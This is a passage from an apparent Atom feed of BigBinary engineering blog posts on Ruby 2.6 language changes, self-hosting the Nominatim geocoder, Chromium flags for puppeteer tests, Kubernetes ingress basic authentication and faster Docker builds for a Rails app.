end</code></pre><p>&quot;&quot; is treated as a variable name in the above example, even though the first
letter () is a capital non-ASCII character.</p><h4>Ruby 2.6</h4><p>Ruby 2.6 relaxes the above-mentioned limitation. We can now define constants in
languages other than English. Languages having capital letters, like Russian and
Greek, can be used to define constant names.</p><p>The below code will run without exception in Ruby 2.6.</p><pre><code class="language-ruby">class 
end</code></pre><p>As capital non-ASCII characters are now treated as constants, the below code will
raise a warning in Ruby 2.6.</p><pre><code class="language-ruby">irb(main):001:0&gt;  = &quot;BigBinary&quot;
=&gt; &quot;BigBinary&quot;
irb(main):002:0&gt;  = &quot;BigBinary&quot;
(irb):2: warning: already initialized constant 
(irb):1: warning: previous definition of  was here</code></pre><p>The above code will run without any warnings on Ruby versions prior to 2.6.</p><p>Here are the relevant <a href="https://github.com/ruby/ruby/commit/f852af">commit</a> and
<a href="https://bugs.ruby-lang.org/issues/13770">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up a high performance Geocoder]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/setting-up-a-high-performance-geocoder"/>
      <updated>2018-08-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/setting-up-a-high-performance-geocoder</id>
      <content type="html"><![CDATA[<p>One of our applications uses geocoding extensively. When we started the project,
we included the excellent
<a href="https://github.com/alexreisner/geocoder">Geocoder gem</a>, and set
<a href="https://developers.google.com/maps/documentation/geocoding/start">Google</a> as
the geocoding backend. As the application scaled, its geocoding requirements
grew, and soon we were looking at geocoding bills worth thousands of dollars.</p><h3>An alternative Geocoder</h3><p>Our search for an alternative geocoder landed us on Nominatim. Written in C,
with a PHP web interface, Nominatim was performant enough for our requirements.
Once set up, Nominatim required 8GB of RAM to run, and this included RAM for
PostgreSQL (+ PostGIS) as well.</p><p>The rest of the blog discusses how to set up Nominatim, the tips and tricks
that we learned along the way, and how it compares with the geocoding solution
offered by Google.</p><h3>Setting up Nominatim</h3><p>We started off by looking for Amazon Machine Images with Nominatim set up and
could only find one, which was hosted by
<a href="https://www.openstreetmap.org/">OpenStreetMap</a>, but the magnet link was dead.</p><p>Next, we went through the
<a href="http://nominatim.org/release-docs/latest/admin/Installation/">official installation document</a>.
We decided to give Docker a shot and found that there are many Nominatim Docker
builds. We used
<a href="https://github.com/merlinnot/nominatim-docker">https://github.com/merlinnot/nominatim-docker</a>
since it seemed to follow all the steps mentioned in the official installation
guide.</p><h3>Issues faced during setup</h3><h4>Out of Memory Errors</h4><p>The official documentation recommends using 32GB of RAM for the initial import, but
we needed to double the memory to 64GB to make it work.</p><p>Also, any time the Docker build failed, due to the large amount of data
generated on each run, we ran out of disk space on subsequent Docker builds
since Docker caches layers across builds.</p><h4>Merging Multiple Regions</h4><p>We wanted to geocode locations from the USA, Mexico, Canada and Sri Lanka. The USA,
Mexico and Canada are
<a href="http://download.geofabrik.de/north-america.html#subregions">included by default in the North America data extract</a>,
but we had to merge data for Sri Lanka with North America to get it in the format
required for the initial import.</p><p>The following snippet pre-processes map data for North America and Sri Lanka
into a single data.osm.pbf file that can be directly used by the Nominatim
installer.</p><pre><code class="language-bash">RUN curl -L 'http://download.geofabrik.de/north-america-latest.osm.pbf' \
    --create-dirs -o /srv/nominatim/src/north-america-latest.osm.pbf
RUN curl -L 'http://download.geofabrik.de/asia/sri-lanka-latest.osm.pbf' \
    --create-dirs -o /srv/nominatim/src/sri-lanka-latest.osm.pbf
RUN osmconvert /srv/nominatim/src/north-america-latest.osm.pbf \
    -o=/srv/nominatim/src/north-america-latest.o5m
RUN osmconvert /srv/nominatim/src/sri-lanka-latest.osm.pbf \
    -o=/srv/nominatim/src/sri-lanka-latest.o5m
RUN osmconvert /srv/nominatim/src/north-america-latest.o5m \
    /srv/nominatim/src/sri-lanka-latest.o5m \
    -o=/srv/nominatim/src/data.o5m
RUN osmconvert /srv/nominatim/src/data.o5m \
    -o=/srv/nominatim/src/data.osm.pbf</code></pre><h4>Slow Search Times</h4><p>Once the installation was done, we tried running simple location
<a href="https://nominatim.openstreetmap.org/search.php?q=New+York&amp;polygon_geojson=1&amp;viewbox=">searches like this one</a>,
but the search timed out. Usually Nominatim can provide a lot of information
from its web interface when <code>&amp;debug=true</code> is appended to the search query.</p><pre><code class="language-bash"># from
https://nominatim.openstreetmap.org/search.php?q=New+York&amp;polygon_geojson=1&amp;viewbox=
# to
https://nominatim.openstreetmap.org/search.php?q=New+York&amp;polygon_geojson=1&amp;viewbox=&amp;debug=true</code></pre><p>We created an
<a href="https://github.com/openstreetmap/Nominatim/issues/1023">issue in the Nominatim repository</a>
and got very prompt replies from the Nominatim maintainers, especially from
<a href="https://github.com/lonvia">Sarah Hoffman</a>.</p><pre><code class="language-sql"># runs analyze on the entire nominatim database
psql -d nominatim -c 'ANALYZE VERBOSE'</code></pre><p>The PostgreSQL query planner
<a href="https://www.postgresql.org/docs/9.5/static/planner-stats.html">depends on statistics</a>
collected by the
<a href="https://www.postgresql.org/docs/9.1/static/monitoring-stats.html">postgres statistics collector</a>
while executing a query. In our case, the query planner took an enormous amount of
time to plan queries, as no stats had been collected since we had a fresh
installation.</p><h3>Comparing Nominatim and Google Geocoder</h3><p>We compared 2500 addresses and found that Google geocoded 99% of those
addresses. In comparison, Nominatim could only geocode 47% of the addresses.</p><p>This means we still need to geocode ~50% of addresses using the Google geocoder.
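Since roughly half the addresses still needed Google, one way to wire the two backends together is a simple two-tier fallback. This is a hedged sketch: the lambdas below are stand-ins for real geocoding calls, not the Geocoder gem's API.

```ruby
# Sketch: try the self-hosted Nominatim first; fall back to the paid Google
# geocoder only when Nominatim returns no result.
def geocode_with_fallback(address, primary:, fallback:)
  primary.call(address) || fallback.call(address)
end

# Stub lookups for illustration: "Nominatim" knows one address,
# "Google" answers everything.
nominatim = ->(addr) { { "1600 Pennsylvania Ave" => [38.8977, -77.0365] }[addr] }
google    = ->(addr) { [0.0, 0.0] }

geocode_with_fallback("1600 Pennsylvania Ave", primary: nominatim, fallback: google)
# => [38.8977, -77.0365]
geocode_with_fallback("unknown place", primary: nominatim, fallback: google)
# => [0.0, 0.0]
```

Structuring the lookup this way means every address Nominatim can resolve is one fewer billable Google request.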
We found that we could increase geocoding efficiency by normalizing the addresses
we had.</p><h3>Address Normalization using libpostal</h3><p><a href="https://github.com/openvenues/libpostal">Libpostal</a> is an address normalizer,
which uses
<a href="https://en.wikipedia.org/wiki/Natural-language_processing#Statistical_natural-language_processing_(SNLP)">statistical natural-language processing</a>
to normalize addresses. Libpostal also has
<a href="https://github.com/openvenues/ruby_postal">ruby bindings</a>, which made it quite
easy to use for our test purposes.</p><p>Once libpostal and its ruby bindings were installed (installation is
straightforward and steps are available on
<a href="https://github.com/openvenues/ruby_postal">ruby-postal's github page</a>), we gave
libpostal + Nominatim a go.</p><pre><code class="language-ruby">require 'geocoder'
require 'ruby_postal/expand'
require 'ruby_postal/parser'

Geocoder.configure({lookup: :nominatim, nominatim: { host: &quot;nominatim_host:port&quot;}})

full_address = [... address for normalization ...]
expanded_addresses = Postal::Expand.expand_address(full_address)

parsed_addresses = expanded_addresses.map do |address|
  Postal::Parser.parse_address(address)
end

parsed_addresses.each do |address|
  parsed_address = [:house_number, :road, :city, :state, :postcode, :country].inject([]) do |acc, key|
    # address is of format
    # [{label: 'postcode', value: 12345}, {label: 'city', value: 'NY'} .. ]
    key_value = address.detect { |pair| pair[:label] == key }
    if key_value
      acc &lt;&lt; &quot;#{key_value[:value]}&quot;.titleize
    end
    acc
  end

  coordinates = Geocoder.coordinates(parsed_address.join(&quot;, &quot;))
  if (coordinates.is_a? Array) &amp;&amp; coordinates.present?
    puts &quot;By Libpostal #{coordinates} =&gt; #{parsed_address.join(&quot;, &quot;)}&quot;
    break
  end
end</code></pre><p>With this, we were able to improve our geocoding efficiency by 10%, as
the Nominatim + Libpostal combination could geocode ~59% of addresses.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debug failing puppeteer tests due to background tab]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-failing-tests-in-background-tab-in-puppeteer"/>
      <updated>2018-08-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-failing-tests-in-background-tab-in-puppeteer</id>
      <content type="html"><![CDATA[<p>We have been using puppeteer in one of our projects to write end-to-end tests.
We run our tests in headful mode to see the browser in action.</p><p>If we start the puppeteer tests and do nothing on our laptop (just watch the tests
being executed), then all the tests pass.</p><p>However, if we do our regular work on our laptop while the tests are running,
tests would fail randomly. This was quite puzzling.</p><p>Debugging such flaky tests is hard. We first suspected that the test cases
themselves needed more implicit waits for elements/text to be present/visible
in the DOM.</p><p>After some debugging using puppeteer protocol logs, it seemed like the browser
was performing certain actions very slowly, or was waiting for the browser to be
active (in view) before performing those actions.</p><p>Starting with version 57, Chrome introduced
<a href="https://developers.google.com/web/updates/2017/03/background_tabs">throttling of background tabs</a>
to improve performance and battery life. We execute one test per browser,
meaning we didn't make use of multiple tabs. Also, tests failed only when the
user was performing some other activity while the tests were executing in
other background windows.
<a href="https://developer.mozilla.org/en-US/docs/Web/API/Page_Visibility_API">Pages were hidden</a>
only when the user switched tabs or minimized the browser window containing the tab.</p><p>After observing closely, we noticed that the pages were making requests to the
server. The issue was that the page was not painting when it was not in view. We
added the flag <code>--disable-background-timer-throttling</code>, but we did not notice any
difference.</p><p>After doing some searching, we noticed the flag <code>--disable-renderer-backgrounding</code>
was being used in
<a href="https://github.com/karma-runner/karma-chrome-launcher/blob/01c7efc870e64733d81347d4996fb9bcbf099825/index.js#L42-L46">karma-launcher</a>.
The comment states that it is specifically required on macOS. Here is the
<a href="https://cs.chromium.org/chromium/src/content/browser/renderer_host/render_widget_host_impl.cc?l=684-689">code</a>
responsible for lowering the priority of the renderer when it is hidden.</p><p>But the new flag didn't help either.</p><p>While looking at all the available command-line switches for Chromium, we
stumbled upon <code>--disable-backgrounding-occluded-windows</code>. Chromium also
backgrounds the renderer while the window is not visible to the user. It seems
from the comment that the flag
<a href="https://cs.chromium.org/chromium/src/content/public/common/content_switches.cc?l=99-102">kDisableBackgroundingOccludedWindowsForTesting</a>
was specifically added to avoid non-deterministic behavior during tests.</p><p>We added the following flags to Chromium for running our integration suite, and
this solved our problem.</p><pre><code class="language-js">const chromeArgs = [
  &quot;--disable-background-timer-throttling&quot;,
  &quot;--disable-backgrounding-occluded-windows&quot;,
  &quot;--disable-renderer-backgrounding&quot;,
];</code></pre><p>References</p><ul><li><a href="https://docs.google.com/document/d/18_sX-KGRaHcV3xe5Xk_l6NNwXoxm-23IOepgMx4OlE4/pub">Background tabs &amp; offscreen frames</a></li><li><a href="https://www.chromium.org/developers/design-documents/mac-occlusion">Mac Window Occlusion API Use</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Kubernetes ingress controller for authenticating apps]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-kubernetes-ingress-authentication"/>
      <updated>2018-08-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-kubernetes-ingress-authentication</id>
      <content type="html"><![CDATA[<p><a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">Kubernetes Ingress</a>
has redefined routing in this era of containerization, and with all these
freehand routing techniques the thought of &quot;my router, my rules&quot; seems real.</p><p>We use nginx-ingress as a routing service for our applications. There is a lot
more than routing we can do with ingress. One of the important features is
setting up authentication using ingress for our application. As all the traffic
goes from ingress to our service, it makes sense to set up authentication on
ingress.</p><p>As mentioned in the
<a href="https://github.com/kubernetes/ingress-nginx/tree/master/docs/examples/">ingress repository</a>,
there are different techniques available for authentication, including:</p><ul><li>Basic authentication</li><li>Client-certs authentication</li><li>External authentication</li><li>Oauth external authentication</li></ul><p>In this blog, we will set up authentication for a sample application using the
basic ingress authentication technique.</p><h4>Pre-requisites</h4><ul><li><p>Access to a working kubernetes cluster.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like
<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,
<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,
<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,
<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>,
<a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">ingress</a>
and
<a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/">annotations</a>.</p></li></ul><p>First, let's create the ingress controller resources from the upstream example by running the
following command.</p><pre><code class="language-bash">$ kubectl create -f 
https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/mandatory.yamlnamespace &quot;ingress-nginx&quot; createddeployment &quot;default-http-backend&quot; createdservice &quot;default-http-backend&quot; createdconfigmap &quot;nginx-configuration&quot; createdconfigmap &quot;tcp-services&quot; createdconfigmap &quot;udp-services&quot; createdserviceaccount &quot;nginx-ingress-serviceaccount&quot; createdclusterrole &quot;nginx-ingress-clusterrole&quot; createdrole &quot;nginx-ingress-role&quot; createdrolebinding &quot;nginx-ingress-role-nisa-binding&quot; createdclusterrolebinding &quot;nginx-ingress-clusterrole-nisa-binding&quot; createddeployment &quot;nginx-ingress-controller&quot; created</code></pre><p>Now that ingress controller resources are created we need a service to accessthe ingress.</p><p>Use following manifest to create service for ingress.</p><pre><code class="language-yaml">apiVersion: v1kind: Servicemetadata:  annotations:    service.beta.kubernetes.io/aws-load-balancer-backend-protocol: tcp  labels:    k8s-addon: ingress-nginx.addons.k8s.io  name: ingress-nginx  namespace: ingress-nginxspec:  externalTrafficPolicy: Cluster  ports:    - name: https      port: 443      protocol: TCP      targetPort: http    - name: http      port: 80      protocol: TCP      targetPort: http  selector:    app: ingress-nginx  type: LoadBalancer</code></pre><p>Now, get the ELB endpoint and bind it with some domain name.</p><pre><code class="language-bash">$kubectl create -f ingress-service.ymlservice ingress-nginx created$ kubectl -n ingress-nginx get svc  ingress-nginx -o wideNAME            CLUSTER-IP      EXTERNAL-IP                                                               PORT(S)                      AGE       SELECTORingress-nginx   100.71.250.56   abcghccf8540698e8bff782799ca8h04-1234567890.us-east-2.elb.amazonaws.com   80:30032/TCP,443:30108/TCP   10s       app=ingress-nginx</code></pre><p>Let's create a deployment and service for our 
sample application kibana. We needelasticsearch to run kibana.</p><p>Here is manifest for the sample application.</p><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    app: kibana  name: kibana  namespace: ingress-nginxspec:  replicas: 1  template:    metadata:      labels:        app: kibana    spec:      containers:        - image: kibana:latest          name: kibana          ports:            - containerPort: 5601---apiVersion: v1kind: Servicemetadata:  annotations:  labels:    app: kibana  name: kibana  namespace: ingress-nginxspec:  ports:    - name: kibana      port: 5601      targetPort: 5601  selector:    app: kibana---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    app: elasticsearch  name: elasticsearch  namespace: ingress-nginxspec:  replicas: 1  strategy:    type: RollingUpdate  template:    metadata:      labels:        app: elasticsearch    spec:      containers:        - image: elasticsearch:latest          name: elasticsearch          ports:            - containerPort: 5601---apiVersion: v1kind: Servicemetadata:  annotations:  labels:    app: elasticsearch  name: elasticsearch  namespace: ingress-nginxspec:  ports:    - name: elasticsearch      port: 9200      targetPort: 9200  selector:    app: elasticsearch</code></pre><p>Create the sample application.</p><pre><code class="language-bash">kubectl apply -f kibana.ymldeployment &quot;kibana&quot; createdservice &quot;kibana&quot; createddeployment &quot;elasticsearch&quot; createdservice &quot;elasticsearch&quot; created</code></pre><p>Now that we have created application and ingress resources, it's time to createan ingress and access the application.</p><p>Use the following manifest to create ingress.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1kind: Ingressmetadata:  annotations:  name: kibana-ingress  namespace: ingress-nginxspec:  rules:    - host: logstest.myapp-staging.com      http:        paths:     
     - path: /            backend:              serviceName: kibana              servicePort: 5601</code></pre><pre><code class="language-bash">$kubectl -n ingress-nginx create -f ingress.ymlingress &quot;kibana-ingress&quot; created.</code></pre><p>Now that our application is up, when we access the kibana dashboard using URLhttp://logstest.myapp-staging.com We directly have access to our Kibanadashboard and anyone with this URL can access logs as shown in the followingimage.</p><p><img src="/blog_images/2018/using-kubernetes-ingress-authentication/kibana.png" alt="Kibana dashboard without authentication"></p><p>Now, let's set up a basic authentication using htpasswd.</p><p>Follow below commands to generate the secret for credentials.</p><p>Let's create an auth file with username and password.</p><pre><code class="language-bash">$ htpasswd -c auth kibanaadminNew password: &lt;kibanaadmin&gt;New password:Re-type new password:Adding password for user kibanaadmin</code></pre><p>Create k8s secret.</p><pre><code class="language-bash">$ kubectl -n ingress-nginx create secret generic basic-auth --from-file=authsecret &quot;basic-auth&quot; created</code></pre><p>Verify the secret.</p><pre><code class="language-yaml">kubectl get secret basic-auth -o yamlapiVersion: v1data:  auth: Zm9vOiRhcHIxJE9GRzNYeWJwJGNrTDBGSERBa29YWUlsSDkuY3lzVDAKkind: Secretmetadata:  name: basic-auth  namespace: ingress-nginxtype: Opaque</code></pre><p>Use following annotations in our ingress manifest by updating the ingressmanifest.</p><pre><code class="language-bash">kubectl -n ingress-nginx edit ingress kibana ingress</code></pre><p>Paste the following annotations</p><pre><code class="language-bash">nginx.ingress.kubernetes.io/auth-type: basicnginx.ingress.kubernetes.io/auth-secret: basic-authnginx.ingress.kubernetes.io/auth-realm: &quot;Kibana Authentication Required - kibanaadmin&quot;</code></pre><p>Now that ingress is updated, hit the URL again and as shown in the image belowwe are asked for 
authentication.</p><p><img src="/blog_images/2018/using-kubernetes-ingress-authentication/kibana_auth.png" alt="Kibana dashboard without authentication"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds write_timeout to Net::HTTP]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-write-timeout-to-net-http"/>
      <updated>2018-08-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-write-timeout-to-net-http</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, if we created a large request with <code>Net::HTTP</code>, it would hang
forever until the request was interrupted. To fix this issue, the
<a href="https://docs.ruby-lang.org/en/trunk/Net/HTTP.html#attribute-i-write_timeout">write_timeout</a>
attribute and
<a href="https://docs.ruby-lang.org/en/trunk/Net/HTTP.html#method-i-write_timeout-3D">write_timeout=</a>
method were added to <a href="https://docs.ruby-lang.org/en/2.6.0/">Net::HTTP</a> in Ruby
2.6. The default value for <code>write_timeout</code> is 60 seconds, and it can be set to an
integer or a float value.</p><p>Similarly, the <code>write_timeout</code> attribute and <code>write_timeout=</code> method were added to
the <code>Net::BufferedIO</code> class.</p><p>If any chunk of the request is not written within the number of seconds provided to
<code>write_timeout</code>, a <a href="https://docs.ruby-lang.org/en/2.6.0/">Net::WriteTimeout</a>
exception is raised. The <code>Net::WriteTimeout</code> exception is not raised on Windows
systems.</p><h6>Example</h6><pre><code class="language-ruby"># server.rb
require 'socket'

server = TCPServer.new('localhost', 2345)
loop do
  socket = server.accept
end</code></pre><h5>Ruby 2.5.1</h5><pre><code class="language-ruby"># client.rb
require 'net/http'

connection = Net::HTTP.new('localhost', 2345)
connection.open_timeout = 1
connection.read_timeout = 3
connection.start

post = Net::HTTP::Post.new('/')
body = (('a' * 1023) + &quot;\n&quot;) * 5_000
post.body = body

puts &quot;Sending #{body.bytesize} bytes&quot;
connection.request(post)</code></pre><h6>Output</h6><pre><code class="language-ruby">$ RBENV_VERSION=2.5.1 ruby client.rb
Sending 5120000 bytes</code></pre><p>Ruby 2.5.1 processes the request endlessly unless the above program is interrupted.</p><h5>Ruby 2.6.0-dev</h5><p>Add the <code>write_timeout</code> attribute to the <code>Net::HTTP</code> instance in the client.rb program.</p><pre><code class="language-ruby"># client.rb
require 'net/http'

connection = Net::HTTP.new('localhost', 2345)
connection.open_timeout = 1
connection.read_timeout = 3
# set write_timeout to 10 seconds
connection.write_timeout = 10
connection.start

post = Net::HTTP::Post.new('/')
body = (('a' * 1023) + &quot;\n&quot;) * 5_000
post.body = body

puts &quot;Sending #{body.bytesize} bytes&quot;
connection.request(post)</code></pre><h6>Output</h6><pre><code class="language-ruby">$ RBENV_VERSION=2.6.0-dev ruby client.rb
Sending 5120000 bytes
Traceback (most recent call last):
       13: from client.rb:17:in `&lt;main&gt;'
       12: from /net/http.rb:1479:in `request'
       11: from /net/http.rb:1506:in `transport_request'
       10: from /net/http.rb:1506:in `catch'
        9: from /net/http.rb:1507:in `block in transport_request'
        8: from /net/http/generic_request.rb:123:in `exec'
        7: from /net/http/generic_request.rb:189:in `send_request_with_body'
        6: from /net/protocol.rb:221:in `write'
        5: from /net/protocol.rb:239:in `writing'
        4: from /net/protocol.rb:222:in `block in write'
        3: from /net/protocol.rb:249:in `write0'
        2: from /net/protocol.rb:249:in `each_with_index'
        1: from /net/protocol.rb:249:in `each'
/net/protocol.rb:270:in `block in write0': Net::WriteTimeout (Net::WriteTimeout)</code></pre><p>In Ruby 2.6.0, the above program is terminated with a <code>Net::WriteTimeout</code> exception
after 10 seconds (the value set for the <code>write_timeout</code> attribute).</p><p>Here are the relevant <a href="https://github.com/ruby/ruby/commit/bd7c46">commit</a> and
<a href="https://bugs.ruby-lang.org/issues/13396">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds Dir#each_child & Dir#children instance]]></title>
       <author><name>Tejaswini Chile</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-introduces-dir-each_child-and-dir-children-instance-methods"/>
      <updated>2018-08-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-introduces-dir-each_child-and-dir-children-instance-methods</id>
      <content type="html"><![CDATA[<p>Ruby 2.5 introduced the class-level methods
<a href="https://ruby-doc.org/core-2.5.1/Dir.html#method-c-each_child">Dir::each_child</a>
and <a href="https://ruby-doc.org/core-2.5.1/Dir.html#method-c-children">Dir::children</a>.
We wrote a
<a href="https://blog.bigbinary.com/2017/11/21/ruby-2_5-introduces-dir-children-and-dir-each_child.html">detailed blog</a>
about it.</p><p>In Ruby 2.6, the same methods are added as instance methods on the <code>Dir</code> class.
<code>Dir#children</code> returns an array of all the filenames except
<code>.</code> and <code>..</code> in the directory. <code>Dir#each_child</code> yields each of
the filenames and operates on it.</p><p>Let's have a look at examples to understand it better.</p><h5>Dir#children</h5><pre><code class="language-ruby">directory = Dir.new('/Users/tejaswinichile/workspace')

directory.children
=&gt; [&quot;panda.png&quot;, &quot;apple.png&quot;, &quot;banana.png&quot;, &quot;camera.jpg&quot;]</code></pre><p><code>Dir#each_child</code> iterates and calls the given block for each file entry in the
directory. It passes the filename as a parameter to the block.</p><h5>Dir#each_child</h5><pre><code class="language-ruby">directory = Dir.new('/Users/tejaswinichile/workspace')

directory.each_child { |filename| puts &quot;Currently reading: #{filename}&quot;}

Currently reading: panda.png
Currently reading: apple.png
Currently reading: banana.png
Currently reading: camera.jpg
=&gt; #&lt;Dir:/Users/tejaswinichile/Desktop&gt;</code></pre><p>If we don't pass any block to <code>each_child</code>, it returns an enumerator instead.</p><pre><code class="language-ruby">directory = Dir.new('/Users/tejaswinichile/workspace')

directory.each_child
=&gt; #&lt;Enumerator: #&lt;Dir:/Users/tejaswinichile/Desktop&gt;:each_child&gt;</code></pre><p>Here are the relevant
<a href="https://github.com/ruby/ruby/commit/6a3a7e9114c3ede47d15f0d2a73f392cfcdd1ea7">commit</a>
and <a href="https://bugs.ruby-lang.org/issues/13969">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds exception parameters for Integer & Float methods]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-option-to-not-raise-exception-for-integer-float-methods"/>
      <updated>2018-07-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-option-to-not-raise-exception-for-integer-float-methods</id>
      <content type="html"><![CDATA[<p>We can use the <code>Integer</code> and <code>Float</code> methods to convert values to integers and
floats respectively. Ruby also has the <code>to_i</code> and <code>to_f</code> methods for the same purpose.
Let's see how they differ from the <code>Integer</code> method.</p><pre><code class="language-ruby">&gt;&gt; &quot;1one&quot;.to_i
=&gt; 1

&gt;&gt; Integer(&quot;1one&quot;)
ArgumentError: invalid value for Integer(): &quot;1one&quot;
    from (irb):2:in `Integer'
    from (irb):2
    from /Users/prathamesh/.rbenv/versions/2.4.0/bin/irb:11:in `&lt;main&gt;'</code></pre><p>The <code>to_i</code> method tries to convert the given input to an integer as far as
possible, whereas the <code>Integer</code> method throws an <code>ArgumentError</code> if it can't
convert the input to an integer. The <code>Integer</code> and <code>Float</code> methods parse more
strictly compared to <code>to_i</code> and <code>to_f</code> respectively.</p><p>Sometimes we might need the strictness of <code>Integer</code> and <code>Float</code> but the ability to
not raise an exception every time the input can't be parsed.</p><p>Before Ruby 2.6, it was possible to achieve this in the following way.</p><pre><code class="language-ruby">&gt;&gt; Integer(&quot;msg&quot;) rescue nil
=&gt; nil</code></pre><p>In Ruby 2.6, the
<a href="https://bugs.ruby-lang.org/issues/12732">Integer and Float methods accept a keyword argument exception</a>,
which can be either <code>true</code> or <code>false</code>. If it is <code>false</code>, then no exception is
raised if the input can't be parsed, and <code>nil</code> is returned.</p><pre><code class="language-ruby">&gt;&gt; Float(&quot;foo&quot;, exception: false)
=&gt; nil

&gt;&gt; Integer(&quot;foo&quot;, exception: false)
=&gt; nil</code></pre><p>This is also faster than rescuing the exception and returning <code>nil</code>.</p><pre><code class="language-ruby">&gt;&gt; Benchmark.ips do |x|
?&gt;   x.report(&quot;rescue&quot;) { Integer('foo') rescue nil }
?&gt;   x.report(&quot;kwarg&quot;) { Integer('foo', exception: false) }
?&gt;   x.compare!
?&gt; end

Warming up --------------------------------------
              rescue    41.896k i/100ms
               kwarg    81.459k i/100ms
Calculating -------------------------------------
              rescue    488.006k (± 4.5%) i/s -  2.472M in 5.076848s
               kwarg      1.024M (±11.8%) i/s -  5.050M in 5.024937s

Comparison:
               kwarg:  1023555.3 i/s
              rescue:   488006.0 i/s - 2.10x slower</code></pre><p>As we can see, rescuing the exception is about twice as slow as using the new keyword
argument. We can still use the older technique if we want to return a value
other than <code>nil</code>.</p><pre><code class="language-ruby">&gt;&gt; Integer('foo') rescue 42
=&gt; 42</code></pre><p>By default, the keyword argument <code>exception</code> is set to <code>true</code> for backward
compatibility.</p><p>The Chinese version of this blog is available
<a href="http://madao.me/yi-ruby-2-6-zeng-jia-liao-integer-he-float-fang-fa-de-yi-chang-can-shu/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Speed up Docker image build process of a Rails app]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/speeding-up-docker-image-build-process-of-a-rails-application"/>
      <updated>2018-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/speeding-up-docker-image-build-process-of-a-rails-application</id>
<content type="html"><![CDATA[<p><strong>tl;dr : We reduced the Docker image building time from 10 minutes to 5 minutes by reusing the bundler cache and by precompiling assets.</strong></p><p>We deploy one of our Rails applications on a dedicated Kubernetes cluster. Kubernetes is a good fit for us since it automatically scales the containerized application horizontally based on the load and resource consumption. The prerequisite to deploy any kind of application on Kubernetes is that the application needs to be containerized. We use Docker to containerize our application.</p><p>We have been successfully containerizing and deploying our Rails application on Kubernetes for about a year now. Although containerization was working fine, we were not happy with the overall time spent to containerize the application whenever we changed the source code and deployed the app.</p><p>We use <a href="https://jenkins.io/">Jenkins</a> for building on-demand Docker images of our application with the help of the <a href="https://wiki.jenkins-ci.org/display/JENKINS/CloudBees+Docker+Build+and+Publish+plugin">CloudBees Docker Build and Publish plugin</a>.</p><p>We observed that the average build time of a Jenkins job to build a Docker image was about 9 to 10 minutes.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/build-time-trend-before-speedup-tweaks.png" alt="Screenshot of build time trend graph before speedup tweaks"></p><h2>Investigating what takes the most time</h2><p>We wipe the workspace folder of the Jenkins job after finishing each Jenkins build to avoid any unintentional behavior caused by the residue left from a previous build. The application's folder is about 500 MiB in size. 
Each Jenkins build spends about 20 seconds performing a shallow Git clone of the latest commit of the specified Git branch from our remote GitHub repository.</p><p>After cloning the latest source code, Jenkins executes the <code>docker build</code> command to build a Docker image with a unique tag to containerize the cloned source code of the application.</p><p>The Jenkins build spends another 10 seconds invoking the <code>docker build</code> command and sending the build context to the Docker daemon.</p><pre><code class="language-bash">01:05:43 [docker-builder] $ docker build --build-arg RAILS_ENV=production -t bigbinary/xyz:production-role-management-feature-1529436929 --pull=true --file=./Dockerfile /var/lib/jenkins/workspace/docker-builder
01:05:53 Sending build context to Docker daemon 489.4 MB</code></pre><p>We use the same Docker image on a number of Kubernetes pods. Therefore, we do not want to execute the <code>bundle install</code> and <code>rake assets:precompile</code> tasks while starting a container in each pod, which would prevent that pod from accepting any requests until these tasks are finished.</p><p>The recommended approach is to run the <code>bundle install</code> and <code>rake assets:precompile</code> tasks while or before containerizing the Rails application.</p><p>Following is a trimmed down version of our actual Dockerfile which is used by the <code>docker build</code> command to containerize our application.</p><pre><code class="language-dockerfile">FROM bigbinary/xyz-base:latest

ENV APP_PATH /data/app/
WORKDIR $APP_PATH

ADD . $APP_PATH

ARG RAILS_ENV

RUN bin/bundle install --without development test
RUN bin/rake assets:precompile

CMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></pre><p>The <code>RUN</code> instructions in the above Dockerfile execute the <code>bundle install</code> and <code>rake assets:precompile</code> tasks while building a Docker image. 
